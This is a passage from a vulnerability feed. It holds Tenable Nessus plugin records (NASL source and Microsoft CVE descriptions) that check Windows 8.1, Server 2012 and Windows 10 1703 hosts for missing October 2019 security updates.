vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4519990/windows-8-1-kb4519990\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4520005/windows-8-1-kb4520005\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4519990 or Cumulative Update KB4520005.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520005', '4519990');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520005, 4519990])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T09:20:17", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4519985\nor cumulative update 4520007. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520007.NASL", "href": "https://www.tenable.com/plugins/nessus/129723", "published": "2019-10-08T00:00:00", "title": "KB4519985: Windows Server 2012 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129723);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520007\");\n script_xref(name:\"MSKB\", value:\"4519985\");\n script_xref(name:\"MSFT\", value:\"MS19-4520007\");\n script_xref(name:\"MSFT\", value:\"MS19-4519985\");\n\n script_name(english:\"KB4519985: Windows Server 2012 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4519985\nor cumulative update 4520007. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346)\");\n # https://support.microsoft.com/en-us/help/4520007/windows-server-2012-update-kb4520007\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d72b58b\");\n # https://support.microsoft.com/en-us/help/4519985/windows-server-2012-update-kb4519985\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7951661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4519985 or Cumulative Update KB4520007.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520007', '4519985');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520007, 4519985])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:19:59", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520010.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520010.NASL", "href": "https://www.tenable.com/plugins/nessus/129725", "published": "2019-10-08T00:00:00", "title": "KB4520010: Windows 10 Version 1703 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129725);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1230\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1321\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520010\");\n script_xref(name:\"MSFT\", value:\"MS19-4520010\");\n\n script_name(english:\"KB4520010: Windows 10 Version 1703 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520010.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n 